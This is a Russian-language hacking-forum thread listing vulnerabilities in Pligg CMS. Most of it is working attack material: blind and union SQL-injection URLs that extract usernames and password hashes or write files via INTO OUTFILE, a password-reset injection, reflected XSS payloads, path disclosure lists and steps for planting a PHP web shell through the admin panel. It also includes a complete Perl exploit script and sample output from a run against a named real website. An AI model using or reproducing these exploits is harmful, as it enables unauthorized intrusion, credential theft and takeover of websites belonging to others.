Обзор уязвимостей Pligg

Discussion in 'Веб-уязвимости' started by AFoST, 29 Jun 2009.

  1. AFoST

    Продукт:
    Pligg Content Management System
    Beta 9.8
    09.08.2007
    Homepage: http://www.pligg.com
    Дорк:
    Powered By Pligg

    Blind SQL-injection
    magic_quotes = off
    /out.php
    PHP:
    ------------------------
    ...
    requestID $_REQUEST['id'];
    $requestTitle $_REQUEST['title'];
    $requestURL $_REQUEST['url'];

    if(isset(
    $requestTitle)){
        
    $requestID $db->get_var("SELECT link_id FROM " table_links " WHERE `link_title_url` = '$requestTitle';");
    }

    if(isset(
    $requestURL)){
        
    $requestID $db->get_var("SELECT link_id FROM " table_links " WHERE `link_url` = '$requestURL';");
    }

    if(
    is_numeric($requestID)) {
    ...
    ------------------------
    exploit:
    http://pligg/out.php?title=' union select if(true,1,null) -- -
    http://pligg/out.php?title=' union select if(false,1,null) -- -​
    example:
    exploit:
    http://pligg/out.php?url=' union select if(true,1,null) -- -
    http://pligg/out.php?url=' union select if(false,1,null) -- -​
    example:
    Blind SQL-injection
    register_globals = on
    /userrss.php
    PHP:
    ------------------------
    ...
    if(isset(
    $_REQUEST['user'])){$login $_REQUEST['user'];}
    $user=new User();
    $user->username $login;
    if(!
    $user->read()) {
        echo 
    "error: user does not exist";
        die;
    }
    ...
    if(!empty(
    $_REQUEST['rows'])) 
        
    $rows $_REQUEST['rows'];
    else 
    $rows 40;
    ...
        if(!empty(
    $_REQUEST['status'])) {
            
    $status $_REQUEST['status'];
        } else {
            
    // By default it searches on all
            
    if($search$status 'all';
            else 
    $status 'all';
        }    
        
        switch (
    $status) {
            case 
    'published':
                
    $order_field 'link_published_date';
                
    $link_date 'published_date';
                
    $title $main_smarty->get_config_vars("PLIGG_Visual_Published_News");
                
    $from_where "FROM " table_links " WHERE link_status='published' ";
                break;
            case 
    'queued':
    ...        case
    ...        case
    ...        }
        
    $from_where .= " AND link_author=$user->id "//вот тут можно дописать кусок скул-запроса.
        
        
    $order_by " ORDER BY $order_field DESC ";
        
    $last_modified $db->get_var("SELECT UNIX_TIMESTAMP(max($order_field)) links $from_where");
        
    $sql "SELECT DISTINCT link_id $from_where $order_by LIMIT $rows";
    ------------------------
    exploit
    http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and true -- -
    http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and false -- -​
    example
    Blind SQL-injection
    magic_quotes_gpc = off
    /login.php
    PHP:
    ------------------------
    ...
        if(
    $_POST["processlogin"] == 3) { // if user requests forgotten password
            
    $username trim($_POST['username']);
            if(
    strlen($username) == 0){
                
    $errorMsg $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
            }
            else {
                
    $user $db->get_row("SELECT * FROM `" table_users "` where `user_login` = '".$username."'");
                if(
    $user){
                    
    $salt substr(md5(uniqid(rand(), true)), 0SALT_LENGTH);
    ...
    ------------------------    
    exploit:
    POST:http://pligg/login.php?processlogin=3&username=root' or false -- -
    POST:http://pligg/login.php?processlogin=3&username=root' or true -- -

    if file_priv=Y
    /login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 into outfile '/path/pligg.txt' -- -​
    Blind SQL-injection
    magic_quotes = off
    /story.php
    PHP:
    -------------------------
    ...
    if(isset(
    $_REQUEST['title'])){$requestTitle strip_tags($_REQUEST['title']);}
    ...
    if(isset(
    $requestTitle)){
        
    $tmp "SELECT link_id FROM " table_links " WHERE `link_title_url` = '$requestTitle';";
        
    $requestID $db->get_var($tmp);
        }
    ...
    -------------------------
    exploit:
    http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- -​
    example:
    Blind SQL-injection
    /editlink.php
    PHP:
    -------------------------
    ...
    if(isset(
    $_GET['id'])){
        
    $theid strip_tags($_GET['id']);
    }
    if(isset(
    $_POST['id'])){
        
    $theid strip_tags($_POST['id']);
    }
    ...
    $link $db->get_row("SELECT link_id, link_author FROM " table_links " WHERE link_id=".$theid.";");
    if (
    $link) {
        if (
    $link->link_author==$current_user->user_id || $current_user->user_level == "admin" || $current_user->user_level == "god")
        {
    ...
    -------------------------
    exploit
    http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
    http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- -

    if file_priv=Y
    http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- -​
    example:
    (c) AFoST
     
  2. eLWAux

    AFoST, в версии 1.0.0 все Blind'и не работают)
    т.е. разработчики добавили ф-цию "антихак" sanitize(), и теперь код выглядит так:
    PHP:
    $requestID sanitize($_REQUEST['id'], 3);
    $requestTitle sanitize($_REQUEST['title'], 3);
    $requestURL sanitize($_REQUEST['url'], 3);

    Pligg 1.0.0

    pXSS
    /register_complete.php
    PHP:
    $user=$_GET['user'];

    $usr = new User();
    $usr->username $user;
    if (
    $usr->read()){
        
    $email $usr->email;
    }
    exploit:
    Code:
    /register_complete.php?user=a<script>alert(/xss/);</script>
    example:
    Code:
    http://www.gossipsnipper.com/register_complete.php?user=a<script>alert(/xss/);</script>
    Full path disclosure
    Code:
    /install/header.php
    /install/install0.php
    /install/troubleshooter.php
    /install/install1.php
    /install/menu.php
    /libs/backup/mysql_backup/backup.php
    /libs/backup/mysql_backup/init.php
     
    #2 eLWAux, 29 Jun 2009
  3. AFoST

    Full path disclosure
    /Config_File.class.php
    /Smarty_Compiler.class.php
    /Smarty_Test.class.php
    /class.compiler.php
    /podcast.php
    /settings.php​
    Directory listing
    при удачном htaccess
    http://pligg/cache/
    http://pligg/internal/
    http://pligg/evb/
    http://pligg/libs/
    http://pligg/modules/
    http://pligg/plugins/
    http://pligg/templates/
    http://pligg/templates_c/​
     
  4. AFoST

    Она и в той версии был) но не везде =)
    В этом двиге тот самый интересный Сцукокод на смену админского пароля)) Докрутить б...
     
  5. AFoST

    User password reset to "password"

    Спасибо Gifts за помощь

    PHP:
        if($_GET["processlogin"] == 4) { // if user clicks on the forgotten password confirmation code
            
    $username trim($_GET['username']);
            if(
    strlen($username) == 0){
                
    $errorMsg $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
            }
            else {
                
    $confirmationcode $_GET["confirmationcode"];
                
    $DBconf $db->get_var("SELECT `last_reset_code` FROM `" table_users "` where `user_login` = '".$username."'");
                if(
    $DBconf){
                    if(
    $DBconf == $confirmationcode && !empty($confirmationcode)){
                        
    $db->query('UPDATE `' table_users '` SET `last_reset_code` = "" WHERE `user_login` = "'.$username.'"');
                        
    $db->query('UPDATE `' table_users '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "'.$username.'"');
                        
    $errorMsg $main_smarty->get_config_vars('PLIGG_Visual_Login_Forgot_PassReset');
    exploit:
    /login.php?processlogin=4&username=" or user_login = "god" /*' and 1=0 UNION select 123/*&confirmationcode=123​
     
  6. RulleR

    Version: 1.0.1 (возможно более ранние версии)
    Default table prefix: pligg_

    SQL Injection

    Vuln file: /libs/search.php
    кода довольно много, приводить не буду

    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=paxek&slink=1&scategory=1[COLOR=White])+union+select+(select+concat(0x3c62723e,user_login,0x3a,user_pass,0x3c62723e)+from+[/COLOR][COLOR=Red][prefix][/COLOR][COLOR=White]users+where+user_id=1),null,null--+&adv=1[/COLOR]
    Version: 1.0.3 (последняя на данный момент)

    Blind SQL Injection

    Vuln file: /libs/search.php
    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=[COLOR=Red][search_keywords][/COLOR]&slink=1&scategory=1[COLOR=Red][inj][/COLOR]&adv=1
    Вывода, как в версии 1.0.1, добиться не получилось, т.к. по дефолту в конфиге стоит "error_reporting(E_ERROR)", поэтому крутим как blind.
    Написал эксплойт под это дело.
    Code:
    #!/usr/bin/perl
    
    # Boolean-based blind SQL injection probe against /search.php (Pligg 1.0.3 per the post above).
    # Review notes from the defender's side: every probe carries the literal
    # "ord(substr((select <column> from <prefix><table> where user_id=<n>),<pos>,1))><x>"
    # in the scategory parameter (built in WebGet below) and is sent with a fixed
    # "MSIE 7.0; Windows NT 5.1" User-Agent -- both are stable strings for WAF rules and
    # access-log searches. The bisection in the main loop needs roughly eight requests per
    # extracted character, for up to $length characters, so a run appears as a burst of
    # near-identical search.php GETs from one client. The script dies on the first HTTP
    # error status (see WebGet), so a blocked or 5xx response aborts the run.
    use LWP;
    use Fcntl;
    
    $title = "
    
    [*]=====================================[*]
    !                                         !
    !  Pligg CMS Blind SQL Injection Exploit  !
    !                                         !
    !            Found && coded by RulleR     !
    !                         Antichat.ru     !
    !                                         !
    
    [*]=====================================[*]
    ";
    print $title;
    # Interactive input: base URL, a search keyword that must match an existing story
    # (it is also used as the truth oracle via $regexp), and the scategory value.
    # chop() strips the last character of each answer, i.e. the trailing newline.
    print "\n[+] Enter Host: ";
    chop ($host = <>);
    print "\n[+] Enter Search Keywords: ";
    chop ($searchkey = <>);
    print "\n[+] Enter \"scategory\": ";
    chop ($scat = <>);
    print "\n[>] Exploiting started... $host\n\n";
    print "    Please wait...\n\n";
    
    #________________ CONFIG _______________
    
    # Truth oracle: a "true" response is a results page that still contains a link to the
    # searched story; the pattern is matched against the raw response body in the loop below.
    $regexp = '<a href=.*>'.$searchkey;
    $length = 100;   # upper bound on the number of characters extracted
    $column = 'user_login';#concat_ws(0x3a,user_login,user_pass)
    $prefix = 'pligg_';   # default table prefix (see the version header of this post)
    $table = 'users';
    $user_id = 1;
    $filename = 'Pligg_exp_result.txt';   # extracted value is also written to this local file
    #_______________________________________
    
    # For each character position $start, bisect the byte value over (0, 255] with the
    # "ord(...) > $x" predicate: an oracle hit raises $min, a miss lowers $max. The outer
    # loop stops (last XEK) once a position bottoms out at $max == 1, i.e. ord() <= 1 --
    # presumably the empty substring past the end of the value; otherwise the character is
    # chr($max) as soon as the interval has width 1.
    XEK: for ($start = 1; $start <= $length; $start++) {
             $min = 0;$max = 255;
             while(1) {		     
    	         $x = int(($max - $min)/2 + $min);
    			 if (&WebGet($host,$start,$x) =~ /$regexp/) {
    			     $min = $x;
    			 }
    			 else {
    				 $max = $x;
    			 }
    			 last XEK if ($max == 1);
    			 if ($max - $min == 1) {
    			     $char = chr($max);			     
    			     push (@res, $char);
    			     print @res,"\n";last;				 
    			 }
    			 
    		 }
    	 }
    
    print "\n[!] Exploiting finished :)\n\n";
    print "---------------------- [Result] ----------------------\n";
    print @res,"\n";
    print "------------------------------------------------------\n";
    
    # Persist the banner and the extracted characters to $filename in the working directory
    # (created if missing, opened write-only; existing content is not truncated first).
    sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
    print RESULT $title;
    print RESULT "\n---------------------- [Result] ----------------------\n";
    print RESULT @res; 
    print RESULT "\n------------------------------------------------------\n";
    close (RESULT);
    print "\nResult saving in $filename\n";
    
    # One oracle request. $_[0] = base URL, $_[1] = character position, $_[2] = threshold
    # byte value. Returns the response body; dies (no retry) on any HTTP error status.
    # Note: the empty "()" prototype would reject arguments, but the &WebGet(...) call form
    # used above bypasses prototype checking.
    sub WebGet() {
    	 # The injected predicate lives in scategory; search/slink/adv are fixed so that the
    	 # only thing varying between requests is the threshold value.
    	 $inj = '/search.php?search='.$searchkey.'&slink=1&scategory='.$scat.'+and+ord(substr((select+'.$column.'+from+'.$prefix.$table.'+where+user_id='.$user_id.'),'.$_[1].',1))>'.$_[2].'&adv=1';	 
    	 $request = HTTP::Request->new(GET => $_[0].$inj);
    	 $u_a = LWP::UserAgent->new();
    	 $u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    	 $u_a->timeout(10);
    	 $response = $u_a->request($request);
    	 if ($response->is_error) {
    	     print " ! Error: ".$response->status_line.".\n"; die " :(\n";
    	 }
         return $response->content;
    }
    
    или берем с pastebin.com
    Пример работы (получение login'а админа):
    Code:
    D:\\$_W3b-x3q\cms_all>pligg_exp.pl
    
    [*]=====================================[*]
    !                                         !
    !  Pligg CMS Blind SQL Injection Exploit  !
    !                                         !
    !            Found && coded by RulleR     !
    !                                         !
    
    [*]=====================================[*]
    
    [+] Enter Host: http://doanhnhanso.com/news
    
    [+] Enter Search Keywords: Online
    
    [+] Enter "scategory": 6
    
    [>] Exploiting started... http://doanhnhanso.com/news
    
        Please wait...
    
    d
    do
    doa
    doan
    doanh
    doanhn
    doanhnh
    doanhnha
    doanhnhan
    doanhnhans
    doanhnhanso
    
    [!] Exploiting finished :)
    
    ---------------------- [Result] ----------------------
    doanhnhanso
    ------------------------------------------------------
    
    Result saving in Pligg_exp_result.txt
    Passive XSS
    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=[COLOR=White]</title><script>alert(1)</script>[/COLOR]
    
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php[COLOR=White]?"><script>alert(1)</script>[/COLOR]
    ------------------------------------------------------------
    Need: register_globals = ON
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/advancedsearch.php?category_option=[COLOR=White]<script>alert(1)</script>[/COLOR]
    Upload shell
    Need:admin account

    Admin --> Modules
    Устанавливаем модуль Upload (по дефолту не установлен), включаем модуль (кликаем Disable).
    Далее переходим в Settings --> General Settings
    в Allowed File Type дописываем расширение php.
    Добавляем новость и прикрепляем шелл. Шелл будет в /modules/upload/attachments/[name_shell].php
     
    #6 RulleR, 17 Jan 2010
  7. Qwazar

    RulleR, даже если вывода через ошибку нет, всё равно в сплоитах стоит использовать бинарный поиск, как минимум.
     